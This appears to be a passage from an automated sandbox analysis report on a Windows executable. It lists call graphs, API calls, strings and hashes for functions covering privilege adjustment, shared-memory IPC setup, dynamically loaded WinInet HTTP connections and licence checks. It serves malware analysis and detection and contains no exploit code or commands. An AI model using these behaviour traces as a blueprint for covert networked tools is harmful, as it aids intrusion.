62019->62021 62022 1110f420 std::locale::facet::_Facet_Register 395 API calls 62020->62022 62021->62014 62023 110305af 62022->62023 62024 110305d0 62023->62024 62077 11088860 395 API calls 62023->62077 62054 1108a470 62024->62054 62027 110305e3 OpenMutexA 62028 11030603 CreateMutexA 62027->62028 62029 1103071a CloseHandle 62027->62029 62030 11030623 62028->62030 62031 1108a570 71 API calls 62029->62031 62032 1110f420 std::locale::facet::_Facet_Register 395 API calls 62030->62032 62033 11030730 62031->62033 62037 11030638 62032->62037 62034 11161d01 _strupr_s_l_stat 5 API calls 62033->62034 62035 110310b3 62034->62035 62065 11015c30 LoadLibraryA 62037->62065 62038 1103066d 62039 111450a0 std::locale::facet::_Facet_Register 206 API calls 62038->62039 62040 1103067c 62039->62040 62041 11030689 62040->62041 62042 1103069c 62040->62042 62066 11145ae0 62041->62066 62044 110306a6 GetProcAddress 62042->62044 62045 11030690 62042->62045 62044->62045 62046 110306c0 SetLastError 62044->62046 62047 110281a0 47 API calls 62045->62047 62046->62045 62048 110306cd 62047->62048 62078 110092f0 542 API calls std::locale::facet::_Facet_Register 62048->62078 62050 110306dc 62051 110306f0 WaitForSingleObject 62050->62051 62051->62051 62052 11030702 CloseHandle 62051->62052 62052->62029 62053 11030713 FreeLibrary 62052->62053 62053->62029 62055 1110f420 std::locale::facet::_Facet_Register 395 API calls 62054->62055 62056 1108a4a7 62055->62056 62057 1108a4c9 InitializeCriticalSection 62056->62057 62058 1110f420 std::locale::facet::_Facet_Register 395 API calls 62056->62058 62061 1108a52a 62057->62061 62060 1108a4c2 62058->62060 62060->62057 62079 1116219a 67 API calls std::exception::_Copy_str 62060->62079 62061->62027 62063 1108a4f9 62080 111625f1 RaiseException 62063->62080 62065->62038 62067 111450a0 std::locale::facet::_Facet_Register 206 API calls 62066->62067 62068 11145af2 62067->62068 62069 11145b30 62068->62069 62070 11145af9 LoadLibraryA 62068->62070 62069->62045 62071 11145b2a 62070->62071 62072 11145b0b GetProcAddress 62070->62072 62071->62045 62073 11145b23 FreeLibrary 62072->62073 62074 11145b1b 62072->62074 62073->62071 62074->62073 62075->62016 62076->62019 62077->62024 62078->62050 62079->62063 62080->62057

                                                                                    Executed Functions

                                                                                    Function 1109E190 Relevance: 100.3, APIs: 42, Strings: 15, Instructions: 501filethreadmemoryCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 716 1109e190-1109e1f2 call 1109d980 719 1109e1f8-1109e21b call 1109d440 716->719 720 1109e810 716->720 726 1109e221-1109e235 LocalAlloc 719->726 727 1109e384-1109e386 719->727 721 1109e812-1109e82d call 11161d01 720->721 729 1109e23b-1109e26d InitializeSecurityDescriptor SetSecurityDescriptorDacl GetVersionExA 726->729 730 1109e805-1109e80b call 1109d4d0 726->730 728 1109e316-1109e33b CreateFileMappingA 727->728 734 1109e388-1109e39b GetLastError 728->734 735 1109e33d-1109e35d GetLastError call 1112ef20 728->735 731 1109e2fa-1109e310 729->731 732 1109e273-1109e29e call 1109d3a0 call 1109d3f0 729->732 730->720 731->728 762 1109e2e9-1109e2f1 732->762 763 1109e2a0-1109e2d6 GetSecurityDescriptorSacl 732->763 737 1109e39d 734->737 738 1109e3a2-1109e3b9 MapViewOfFile 734->738 748 1109e368-1109e370 735->748 749 1109e35f-1109e366 LocalFree 735->749 737->738 741 1109e3bb-1109e3d6 call 1112ef20 738->741 742 1109e3f7-1109e3ff 738->742 765 1109e3d8-1109e3d9 LocalFree 741->765 766 1109e3db-1109e3e3 741->766 746 1109e4a1-1109e4b3 742->746 747 1109e405-1109e41e GetModuleFileNameA 742->747 754 1109e4f9-1109e512 call 11161d20 GetTickCount 746->754 755 1109e4b5-1109e4b8 746->755 756 1109e4bd-1109e4d8 call 1112ef20 747->756 757 1109e424-1109e42d 747->757 750 1109e372-1109e373 LocalFree 748->750 751 1109e375-1109e37f 748->751 749->748 750->751 761 1109e7fe-1109e800 call 1109d8c0 751->761 781 1109e514-1109e519 754->781 758 1109e59f-1109e603 GetCurrentProcessId GetModuleFileNameA call 1109d810 755->758 779 1109e4da-1109e4db LocalFree 756->779 780 1109e4dd-1109e4e5 756->780 757->756 759 1109e433-1109e436 757->759 783 1109e60b-1109e622 CreateEventA 758->783 784 1109e605 758->784 768 1109e479-1109e49c call 1112ef20 call 1109d8c0 759->768 769 1109e438-1109e43c 759->769 761->730 762->731 773 1109e2f3-1109e2f4 FreeLibrary 762->773 763->762 772 1109e2d8-1109e2e3 SetSecurityDescriptorSacl 763->772 765->766 775 1109e3e8-1109e3f2 766->775 776 1109e3e5-1109e3e6 LocalFree 766->776 768->746 769->768 778 1109e43e-1109e449 769->778 772->762 773->731 775->761 776->775 785 1109e450-1109e454 778->785 779->780 786 1109e4ea-1109e4f4 780->786 787 1109e4e7-1109e4e8 LocalFree 780->787 788 1109e51b-1109e52a 781->788 789 1109e52c 781->789 793 1109e624-1109e643 GetLastError * 2 call 1112ef20 783->793 794 1109e646-1109e64e 783->794 784->783 791 1109e470-1109e472 785->791 792 1109e456-1109e458 785->792 786->761 787->786 788->781 788->789 795 1109e52e-1109e534 789->795 800 1109e475-1109e477 791->800 797 1109e45a-1109e460 792->797 798 1109e46c-1109e46e 792->798 793->794 801 1109e650 794->801 802 1109e656-1109e667 CreateEventA 794->802 803 1109e545-1109e59d 795->803 804 1109e536-1109e543 795->804 797->791 805 1109e462-1109e46a 797->805 798->800 800->756 800->768 801->802 807 1109e669-1109e688 GetLastError * 2 call 1112ef20 802->807 808 1109e68b-1109e693 802->808 803->758 804->795 804->803 805->785 805->798 807->808 810 1109e69b-1109e6ad CreateEventA 808->810 811 1109e695 808->811 812 1109e6af-1109e6ce GetLastError * 2 call 1112ef20 810->812 813 1109e6d1-1109e6d9 810->813 811->810 812->813 816 1109e6db 813->816 817 1109e6e1-1109e6f2 CreateEventA 813->817 816->817 819 1109e714-1109e722 817->819 820 1109e6f4-1109e711 GetLastError * 2 call 1112ef20 817->820 822 1109e724-1109e725 LocalFree 819->822 823 1109e727-1109e72f 819->823 820->819 822->823 825 1109e731-1109e732 LocalFree 823->825 826 1109e734-1109e73d 823->826 825->826 827 1109e743-1109e746 826->827 828 1109e7e7-1109e7f9 call 1112ef20 826->828 827->828 829 1109e74c-1109e74f 827->829 828->761 829->828 831 1109e755-1109e758 829->831 831->828 833 1109e75e-1109e761 831->833 834 1109e76c-1109e788 CreateThread 833->834 835 1109e763-1109e769 GetCurrentThreadId 833->835 836 1109e78a-1109e794 834->836 837 1109e796-1109e7a0 834->837 835->834 836->761 838 1109e7ba-1109e7e5 SetEvent call 1112ef20 call 1109d4d0 837->838 839 1109e7a2-1109e7b8 ResetEvent * 3 837->839 838->721 839->838
                                                                                    APIs
                                                                                      • Part of subcall function 1109D440: GetCurrentProcess.KERNEL32(000F01FF,?,11030063,00000000,00000000,00080000,420B7E12,00080000,00000000,00000000), ref: 1109D46D
                                                                                      • Part of subcall function 1109D440: OpenProcessToken.ADVAPI32(00000000), ref: 1109D474
                                                                                      • Part of subcall function 1109D440: LookupPrivilegeValueA.ADVAPI32(00000000,00000000,?), ref: 1109D485
                                                                                      • Part of subcall function 1109D440: AdjustTokenPrivileges.KERNELBASE(00000000), ref: 1109D4A9
                                                                                    • LocalAlloc.KERNEL32(00000040,00000014,SeSecurityPrivilege,?,00080000,420B7E12,00080000,00000000,00000000), ref: 1109E225
                                                                                    • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 1109E23E
                                                                                    • SetSecurityDescriptorDacl.ADVAPI32(00000000,00000001,00000000,00000000), ref: 1109E249
                                                                                    • GetVersionExA.KERNEL32(?), ref: 1109E260
                                                                                    • GetSecurityDescriptorSacl.ADVAPI32(?,?,?,?,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2CE
                                                                                    • SetSecurityDescriptorSacl.ADVAPI32(00000000,00000001,?,00000000), ref: 1109E2E3
                                                                                    • FreeLibrary.KERNEL32(00000001,S:(ML;;NW;;;LW),00000001,?,00000000), ref: 1109E2F4
                                                                                    • CreateFileMappingA.KERNEL32(000000FF,11030063,00000004,00000000,?,?), ref: 1109E330
                                                                                    • GetLastError.KERNEL32 ref: 1109E33D
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E366
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E373
                                                                                    • GetLastError.KERNEL32 ref: 1109E390
                                                                                    • MapViewOfFile.KERNEL32(?,000F001F,00000000,00000000,00000000), ref: 1109E3AE
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E3D9
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E3E6
                                                                                      • Part of subcall function 1109D3A0: LoadLibraryA.KERNEL32(Advapi32.dll,00000000,1109E27E), ref: 1109D3A8
                                                                                      • Part of subcall function 1109D3F0: GetProcAddress.KERNEL32(00000000,ConvertStringSecurityDescriptorToSecurityDescriptorA), ref: 1109D404
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E412
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E4DB
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E4E8
                                                                                    • _memset.LIBCMT ref: 1109E500
                                                                                    • GetTickCount.KERNEL32 ref: 1109E508
                                                                                    • GetCurrentProcessId.KERNEL32 ref: 1109E5B4
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 1109E5CF
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?,?,?,?,?,?), ref: 1109E61B
                                                                                    • GetLastError.KERNEL32 ref: 1109E624
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E62B
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E660
                                                                                    • GetLastError.KERNEL32 ref: 1109E669
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E670
                                                                                    • CreateEventA.KERNEL32(?,00000001,00000000,?), ref: 1109E6A6
                                                                                    • GetLastError.KERNEL32 ref: 1109E6AF
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E6B6
                                                                                    • CreateEventA.KERNEL32(?,00000000,00000000,?), ref: 1109E6EB
                                                                                    • GetLastError.KERNEL32 ref: 1109E6FA
                                                                                    • GetLastError.KERNEL32(00000000), ref: 1109E6FD
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E725
                                                                                    • LocalFree.KERNEL32(?), ref: 1109E732
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 1109E763
                                                                                    • CreateThread.KERNEL32(00000000,00002000,Function_0009DD20,00000000,00000000,00000030), ref: 1109E77D
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7AC
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7B2
                                                                                    • ResetEvent.KERNEL32(?), ref: 1109E7B8
                                                                                    • SetEvent.KERNEL32(?), ref: 1109E7BE
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: ErrorLast$FreeLocal$Event$Create$DescriptorFileSecurity$CurrentProcessReset$LibraryModuleNameSaclThreadToken$AddressAdjustAllocCountDaclInitializeLoadLookupMappingOpenPrivilegePrivilegesProcTickValueVersionView_memset
                                                                                    • String ID: Cant create event %s, e=%d (x%x)$Error cant create events$Error cant map view$Error creating filemap (%d)$Error filemap exists$IPC(%s) created$Info - reusing existing filemap$S:(ML;;NW;;;LW)$SeSecurityPrivilege$cant create events$cant create filemap$cant create thread$cant map$map exists$warning map exists
                                                                                    • API String ID: 3291243470-2792520954
                                                                                    • Opcode ID: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                    • Instruction ID: e0f3534def007632db5cc521867dfefedb1bc63d92e862916d16df31d0e36df5
                                                                                    • Opcode Fuzzy Hash: e1e4d2c24c486b94928180782bcaf8fbecda1daffafc4b641c279d7d38800a12
                                                                                    • Instruction Fuzzy Hash: 221282B590026D9FE724DF61CCD4EAEF7BABB88308F0049A9E11997244D771AD84CF51
                                                                                    Function 11029590 Relevance: 88.0, APIs: 38, Strings: 12, Instructions: 534libraryloadernetworkCOMMON
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 844 11029590-1102961e LoadLibraryA 845 11029621-11029626 844->845 846 11029628-1102962b 845->846 847 1102962d-11029630 845->847 848 11029645-1102964a 846->848 849 11029632-11029635 847->849 850 11029637-11029642 847->850 851 11029679-11029685 848->851 852 1102964c-11029651 848->852 849->848 850->848 855 1102972a-1102972d 851->855 856 1102968b-110296a3 call 11162b51 851->856 853 11029653-1102966a GetProcAddress 852->853 854 1102966c-1102966f 852->854 853->854 857 11029671-11029673 SetLastError 853->857 854->851 859 11029748-11029760 InternetOpenA 855->859 860 1102972f-11029746 GetProcAddress 855->860 867 110296c4-110296d0 856->867 868 110296a5-110296be GetProcAddress 856->868 857->851 861 11029784-11029790 _free 859->861 860->859 864 11029779-11029781 SetLastError 860->864 865 11029796-110297c7 call 11142290 call 11164390 861->865 866 11029a0a-11029a14 861->866 864->861 890 110297c9-110297cc 865->890 891 110297cf-110297e4 call 11081a70 * 2 865->891 866->845 871 11029a1a 866->871 872 110296d2-110296db GetLastError 867->872 876 110296f1-110296f3 867->876 868->867 869 11029762-1102976a SetLastError 868->869 869->872 875 11029a2c-11029a2f 871->875 872->876 877 110296dd-110296ef _free call 11162b51 872->877 879 11029a31-11029a36 875->879 880 11029a3b-11029a3e 875->880 882 11029710-1102971c 876->882 883 110296f5-1102970e GetProcAddress 876->883 877->876 885 11029b9f-11029ba7 879->885 886 11029a40-11029a45 880->886 887 11029a4a 880->887 882->855 905 1102971e-11029727 882->905 883->882 889 1102976f-11029777 SetLastError 883->889 892 11029bb0-11029bc3 885->892 893 11029ba9-11029baa FreeLibrary 885->893 894 11029b6f-11029b74 886->894 895 11029a4d-11029a55 887->895 889->855 890->891 915 110297e6-110297ea 891->915 916 110297ed-110297f9 891->916 893->892 896 11029b76-11029b8d GetProcAddress 894->896 897 11029b8f-11029b95 894->897 900 11029a57-11029a6e GetProcAddress 895->900 901 11029a74-11029a7d 895->901 896->897 903 11029b97-11029b99 SetLastError 896->903 897->885 900->901 902 11029b2e-11029b30 SetLastError 900->902 906 11029a80-11029a82 901->906 908 11029b36-11029b3d 902->908 903->885 905->855 906->908 910 11029a88-11029a8d 906->910 911 11029b4c-11029b6d call 110278a0 * 2 908->911 910->911 913 11029a93-11029acf call 1110f4a0 call 11027850 910->913 911->894 941 11029ae1-11029ae3 913->941 942 11029ad1-11029ad4 913->942 915->916 917 11029824-11029829 916->917 918 110297fb-110297fd 916->918 925 1102982b-1102983c GetProcAddress 917->925 926 1102983e-11029855 InternetConnectA 917->926 922 11029814-1102981a 918->922 923 110297ff-11029812 GetProcAddress 918->923 922->917 923->922 928 1102981c-1102981e SetLastError 923->928 925->926 930 11029881-1102988c SetLastError 925->930 931 110299f7-11029a07 call 111618c1 926->931 932 1102985b-1102985e 926->932 928->917 930->931 931->866 936 11029860-11029862 932->936 937 11029899-110298a1 932->937 943 11029864-11029877 GetProcAddress 936->943 944 11029879-1102987f 936->944 939 110298a3-110298b7 GetProcAddress 937->939 940 110298b9-110298d4 937->940 939->940 945 110298d6-110298de SetLastError 939->945 951 110298e1-110298e4 940->951 947 11029ae5 941->947 948 11029aec-11029af1 941->948 942->941 946 11029ad6-11029ada 942->946 943->944 949 11029891-11029893 SetLastError 943->949 944->937 945->951 946->941 952 11029adc 946->952 947->948 953 11029af3-11029b09 call 110d1090 948->953 954 11029b0c-11029b0e 948->954 949->937 959 110299f2-110299f5 951->959 960 110298ea-110298ef 951->960 952->941 953->954 957 11029b10-11029b12 954->957 958 11029b14-11029b25 call 111618c1 954->958 957->958 963 11029b3f-11029b49 call 111618c1 957->963 958->911 971 11029b27-11029b29 958->971 959->931 962 11029a1c-11029a29 call 111618c1 959->962 965 110298f1-11029908 GetProcAddress 960->965 966 1102990a-11029916 960->966 962->875 963->911 965->966 970 11029918-11029920 SetLastError 965->970 975 11029922-1102993b GetLastError 966->975 970->975 971->895 976 11029956-1102996b 975->976 977 1102993d-11029954 GetProcAddress 975->977 980 11029975-11029983 GetLastError 976->980 977->976 978 1102996d-1102996f SetLastError 977->978 978->980 981 11029985-1102998a 980->981 982 1102998c-11029998 GetDesktopWindow 980->982 981->982 983 110299e2-110299e7 981->983 984 110299b3-110299cf 982->984 985 1102999a-110299b1 GetProcAddress 982->985 983->959 987 110299e9-110299ef 983->987 984->959 989 110299d1 984->989 985->984 986 110299d6-110299e0 SetLastError 985->986 986->959 987->959 989->951
                                                                                    APIs
                                                                                    • LoadLibraryA.KERNEL32(WinInet.dll,420B7E12,74DF23A0,?,00000000), ref: 110295C5
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102965F
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029673
                                                                                    • _malloc.LIBCMT ref: 11029697
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 110296B1
                                                                                    • GetLastError.KERNEL32 ref: 110296D2
                                                                                    • _free.LIBCMT ref: 110296DE
                                                                                    • _malloc.LIBCMT ref: 110296E7
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryOptionA), ref: 11029701
                                                                                    • GetProcAddress.KERNEL32(?,InternetOpenA), ref: 1102973B
                                                                                    • InternetOpenA.WININET(11194244,?,?,000000FF,00000000), ref: 1102975A
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029764
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029771
                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102977B
                                                                                    • _free.LIBCMT ref: 11029785
                                                                                      • Part of subcall function 11162BE5: HeapFree.KERNEL32(00000000,00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162BFB
                                                                                      • Part of subcall function 11162BE5: GetLastError.KERNEL32(00000000,?,1116B7A6,00000000,?,1110F4AE,?,?,?,?,11145032,?,?,?), ref: 11162C0D
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029805
                                                                                    • SetLastError.KERNEL32(00000078), ref: 1102981E
                                                                                    • GetProcAddress.KERNEL32(?,InternetConnectA), ref: 11029831
                                                                                    • InternetConnectA.WININET(000000FF,11199690,00000050,00000000,00000000,00000003,00000000,00000000), ref: 1102984E
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 1102986A
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029883
                                                                                    • GetProcAddress.KERNEL32(?,HttpOpenRequestA), ref: 110298A9
                                                                                    • GetProcAddress.KERNEL32(?,HttpSendRequestA), ref: 110298FD
                                                                                    • GetProcAddress.KERNEL32(?,InternetQueryDataAvailable), ref: 11029A63
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029B30
                                                                                    • GetProcAddress.KERNEL32(?,InternetCloseHandle), ref: 11029B82
                                                                                    • SetLastError.KERNEL32(00000078), ref: 11029B99
                                                                                    • FreeLibrary.KERNEL32(?), ref: 11029BAA
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: AddressProc$ErrorLast$FreeInternetLibrary_free_malloc$ConnectHeapLoadOpen
                                                                                    • String ID: ://$GET$HttpOpenRequestA$HttpQueryInfoA$HttpSendRequestA$InternetCloseHandle$InternetConnectA$InternetErrorDlg$InternetOpenA$InternetQueryDataAvailable$InternetQueryOptionA$WinInet.dll
                                                                                    • API String ID: 921868004-913974648
                                                                                    • Opcode ID: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                    • Instruction ID: e81a0880bf89439be6f70403065d0babe3f5b16467f55efefddb7e1ac6149969
                                                                                    • Opcode Fuzzy Hash: 36508fb7aa93ad5402a0a829a6fade002c528e1580f22bfa2ed00e1b157900af
                                                                                    • Instruction Fuzzy Hash: 5E127FB0D04269EBEB11CFA9CC88A9EFBF9FF88754F604569E465E7240E7705940CB60
                                                                                    Function 11061C90 Relevance: 76.5, APIs: 22, Strings: 21, Instructions: 1221COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 11144EA0: GetLastError.KERNEL32(?,023CB898,000000FF,?), ref: 11144ED5
                                                                                      • Part of subcall function 11144EA0: Sleep.KERNEL32(000000C8,?,?,?,?,?,?,023CB898,000000FF,?), ref: 11144EE5
                                                                                    • _fgets.LIBCMT ref: 11061DC2
                                                                                    • _strpbrk.LIBCMT ref: 11061E29
                                                                                    • _fgets.LIBCMT ref: 11061F2C
                                                                                    • _strpbrk.LIBCMT ref: 11061FA3
                                                                                    • __wcstoui64.LIBCMT ref: 11061FBC
                                                                                    • _fgets.LIBCMT ref: 11062035
                                                                                    • _strpbrk.LIBCMT ref: 1106205B
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
                                                                                    • Associated: 00000004.00000002.4160623876.0000000011000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160810458.0000000011193000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160864240.00000000111E1000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160895983.00000000111F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000111F6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001125C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.0000000011287000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001129D000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112B3000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.00000000112DE000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    • Associated: 00000004.00000002.4160930065.000000001132A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_4_2_11000000_bild.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: _fgets_strpbrk$ErrorLastSleep__wcstoui64
                                                                                    • String ID: %c%04d%s$%s.%04d.%s$/- $?expirY$?starT$ACM$Client$Expired$_License$_checksum$_include$_version$cd_install$defaults$enforce$expiry$inactive$licensee$product$shrink_wrap$start
                                                                                    • API String ID: 716802716-1571441106
                                                                                    • Opcode ID: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                    • Instruction ID: 9b454a0e08db4b844aa329f9a873b431930d9d904307df7fc69ae15b9a8492e5
                                                                                    • Opcode Fuzzy Hash: 32dce6010c3087015648dbee5c865c0eda81171851eef29cc693b610d01e18e4
                                                                                    • Instruction Fuzzy Hash: 55A2D375E0461A9FEB21CF64CC80BEFB7B9AF44345F0041D9E849A7281EB71AA45CF61
                                                                                    Function 11143570 Relevance: 66.6, APIs: 20, Strings: 18, Instructions: 134libraryloaderCOMMONLIBRARYCODE
                                                                                    Download Yara Rule

                                                                                    Control-flow Graph

                                                                                    • Executed
                                                                                    • Not Executed
                                                                                    control_flow_graph 1642 11143570-111435b1 GetModuleFileNameA 1643 111435f3 1642->1643 1644 111435b3-111435c6 call 11081b40 1642->1644 1646 111435f9-111435fd 1643->1646 1644->1643 1650 111435c8-111435f1 LoadLibraryA 1644->1650 1648 111435ff-1114360c LoadLibraryA 1646->1648 1649 11143619-11143637 GetModuleHandleA GetProcAddress 1646->1649 1648->1649 1651 1114360e-11143616 LoadLibraryA 1648->1651 1652 11143647-11143670 GetProcAddress * 4 1649->1652 1653 11143639-11143645 1649->1653 1650->1646 1651->1649 1654 11143673-111436eb GetProcAddress * 10 call 11161d01 1652->1654 1653->1654 1656 111436f0-111436f3 1654->1656
                                                                                    APIs
                                                                                    • GetModuleFileNameA.KERNEL32(00000000,?,00000104,00000000,8504C483,74DF23A0), ref: 111435A3
                                                                                    • LoadLibraryA.KERNEL32(?), ref: 111435EC
                                                                                    • LoadLibraryA.KERNEL32(DBGHELP.DLL), ref: 11143605
                                                                                    • LoadLibraryA.KERNEL32(IMAGEHLP.DLL), ref: 11143614
                                                                                    • GetModuleHandleA.KERNEL32(?), ref: 1114361A
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromAddr), ref: 1114362E
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineFromName), ref: 1114364D
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLineNext), ref: 11143658
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetLinePrev), ref: 11143663
                                                                                    • GetProcAddress.KERNEL32(00000000,SymMatchFileName), ref: 1114366E
                                                                                    • GetProcAddress.KERNEL32(00000000,StackWalk), ref: 11143679
                                                                                    • GetProcAddress.KERNEL32(00000000,SymCleanup), ref: 11143684
                                                                                    • GetProcAddress.KERNEL32(00000000,SymLoadModule), ref: 1114368F
                                                                                    • GetProcAddress.KERNEL32(00000000,SymInitialize), ref: 1114369A
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetOptions), ref: 111436A5
                                                                                    • GetProcAddress.KERNEL32(00000000,SymSetOptions), ref: 111436B0
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetModuleInfo), ref: 111436BB
                                                                                    • GetProcAddress.KERNEL32(00000000,SymGetSymFromAddr), ref: 111436C6
                                                                                    • GetProcAddress.KERNEL32(00000000,SymFunctionTableAccess), ref: 111436D1
                                                                                    • GetProcAddress.KERNEL32(00000000,MiniDumpWriteDump), ref: 111436DC
                                                                                      • Part of subcall function 11081B40: _strrchr.LIBCMT ref: 11081B4E
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000004.00000002.4160655337.0000000011001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 11000000, based on PE: true
